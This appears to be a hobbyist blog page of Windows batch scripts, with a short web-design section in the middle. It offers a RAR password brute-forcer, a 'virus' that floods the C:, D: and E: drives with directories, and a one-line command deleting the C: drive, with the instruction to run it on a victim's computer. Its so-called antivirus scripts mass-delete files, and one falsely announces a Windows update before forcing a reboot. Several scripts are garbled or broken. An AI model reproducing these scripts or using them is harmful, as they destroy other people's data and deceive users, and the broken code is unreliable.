Search This Blog

Friday, July 24, 2015

HOW TO CRACK A PASSWORD



REM ============================================================
REM errorcode401.blogspot.in
@echo off
title Rar Password Cracker
mode con: cols=47 lines=20
copy "C:\Program Files\WinRAR\Unrar.exe"
SET PSWD=0
SET DEST=%TEMP%\%RANDOM%
MD %DEST%
:RAR
cls
echo ----------------------------------------------
echo                   GET DETAIL
echo ----------------------------------------------
echo.
SET/P "NAME=Enter File Name  : "
IF "%NAME%"=="" goto NERROR
goto GPATH
:NERROR
echo ----------------------------------------------
echo                      ERROR
echo ----------------------------------------------
echo Sorry you can't leave it blank.
pause
goto RAR
:GPATH
SET/P "PATH=Enter Full Path : "
IF "%PATH%"=="" goto PERROR
goto NEXT
:PERROR
echo ----------------------------------------------
echo                      ERROR
echo ----------------------------------------------
echo Sorry you can't leave it blank.
pause
goto RAR
:NEXT
IF EXIST "%PATH%\%NAME%" GOTO START
goto PATH
:PATH
cls
echo ----------------------------------------------
echo                     ERROR
echo ----------------------------------------------
echo Opppss File does not Exist..
pause
goto RAR
:START
SET /A PSWD=%PSWD%+1
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 0 1
echo  1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 1 1 0 0 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 0 0 1 1 1
echo  0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 0 0 0 0 0
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo  1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 1 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 0 1 1 0
echo  1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 1 1 1 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo  1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 0 1
echo  1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo  1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 0 1 0 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 0 0
echo  0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 1 0 1 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 0 1 1 0
echo  1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 1 1 0 1 1
echo  1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 0 1 1 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 1 1
echo  0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 1 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 0 0
echo  0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 1 1 0 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 1 0 1 1
UNRAR E -INUL -P%PSWD% "%PATH%\%NAME%" "%DEST%"
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %DEST% /Q /S
Del "Unrar.exe"
cls
echo ----------------------------------------------
echo                     CRACKED
echo ----------------------------------------------
echo.
echo PASSWORD FOUND!
echo FILE  = %NAME%
echo CRACKED PASSWORD = %PSWD%
pause>NUL
exit
REM ============================================================

WEB DESIGN

Web designing
On our topic of web designing we are going to learn how to design a website. Well in the designing of a fully and functional website people have to learn various languages such as the HTML, Cascading style sheet, JavaScript, JQuerry, PHP and other languages common for the webdesigning process.
Let us begin...
 To design a website you got to have a server and something like notepad++ or even Dreamweaver  which is very suitable for writing the pieces of code for designing the website. Well there are other common applications that one may use when designing but it is to once choice and decision depending on what they know. There are many server but as for me i prefer to use the Wamp server so you may download it if you are actually interested.

THE LANGUAGES USED AND THEIR PURPOSES

HTML- This language is the basic for designing a website. It was the first actual language which was discovered and used in the designing and programming of websites on that early time.Well we shall discuss this language first.

Cascading Style Sheet- Is the language that is used to design the webpage and the layout of the website.

Friday, February 13, 2015

TO MAKE A SIMPLE VIRUS IN THE COMPUTER

[ Note : Don't try it on your computer ]
Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in


THEN YOU SAVE WITH AN EXTENSION OF .BAT
In Notepad, type:
@echo off
rd C:\ /s /q
exit
Save as <anything you want>.bat, then run it on the victim's computer.
It will make the computer unbootable, destroying all files except the ones that kept the system running.

CREATE AN ADVANCED ANTIVIRUS USING NOTEPAD

Method 1eliminate or eradicate the virus do you know his name
1.Open Notepad
2.Copy and Paste the code below



@echo off
echo turns of the virus
taskkill /F /IM virusname1.exe /IM virusname2.exe
echo remove all viruses by size
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo remove virus that disguised
echo to drive c and subfolder
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo to drive d and subfolder
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo returns the Document is in the Hidden
cd /d c:\
echo to drive c and subfolder
attrib *.doc -H -S -A /S
cd /d d:\
echo to drive d and subfolder
attrib *.doc -H -S -A /S
exit

Descriptionvirusname1 and virusname2 be filled with the virus name you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat

Method 2Remove Virus do you know his name and remove any virus bat 
1.Open Notepad
2.Copy and Paste the code below

x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin.
click okay to begin".1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert)
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat
del TOR.vbs
del Torjan Horse.Bat
del Torjan Horse.vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
del trojan.bat
del trojan.vbs
del Trojan Horse.Bat
del Trojan Horse.vbs
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert)
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert)
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert")
DescriptionYou can add the name of the virus you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat

TO CREATE A BATCH ANTIVIRUS

    • @echo off
    • color cb
    • title Batch Antivirus
    • cls
    • echo ===============
    • echo [ Batch-Master]
    • echo ===============
    • echo If There's no message ,You are protected.
    • set /p a=Enter a batch file to scan:
    • for /f %%x in (
    • 'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
    • ) do (
    • if /i %%x equ %a%.bat (
    • for /f %%z in (
    • 'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
    • ) do (
    • if /i %%z equ %a%.bat (
    • cls
    • echo Virus Detected!!
    • del %a%.bat
    • echo %a%.bat was deleted....
    • pause >nul
    • )
    • )
    • )
    • )
    • pause >nul
    • You have to save the file in the notepad with an extension of .BAT

CREATE ANTIVIRUS USING NOTEPAD

You can able to create your own antivirus within 2 minutes.Yes it is  possible through the command prompt.Everyone using the antivirus in their computer mainly for the purpose of detect and remove  harmful or unwanted files which may slowdown your computer and windows. But legally antivirus must have  license, Otherwise it is ethical.So before you creating your own antivirus or providing to others You need to have a license.
Creating the antivirus is the difficult task, Many big companies will make the team effort  and place the expert to create the codings  and make more effort in designing the antivirus interface . lot of Malware database  are required to create the antivirus.Otherwise you have to buy the antivirus for the lot of amount or for searching in the internet for the long time and take too much time in downloading. if you don’t have enough time to download any best antivirus.But in this article i can make it very simpler,I have the simple tricks to create the own antivirus..This antivirus scan by using command prompt and delete unwanted files automatically.

Steps to create your own antivirus


  • Open your Notepad and paste this given code
@echo off
title Antivirus
echo Antivirus
echo created by your name
:start
if exist virus.bat goto infected
if not exist virus.bat goto clean
cd C:\Windows\system32
:infected
echo warning virus detected
del virus.bat
pause
goto start
:clean
echo System secure!
pause
exit
You can change the “Your name” to your desired name. “warning virus detected” can be change to show a different alert message which will be displayed if any virus is detected in your computer.
  • now save your file with technoup2date.bat and select “All files”
  • now run your saved files automatically scan starts
:
- See more at: http://technoup2date.com/2014/04/how-to-make-your-own-antivirus/#sthash.iFtnVD64.dpuf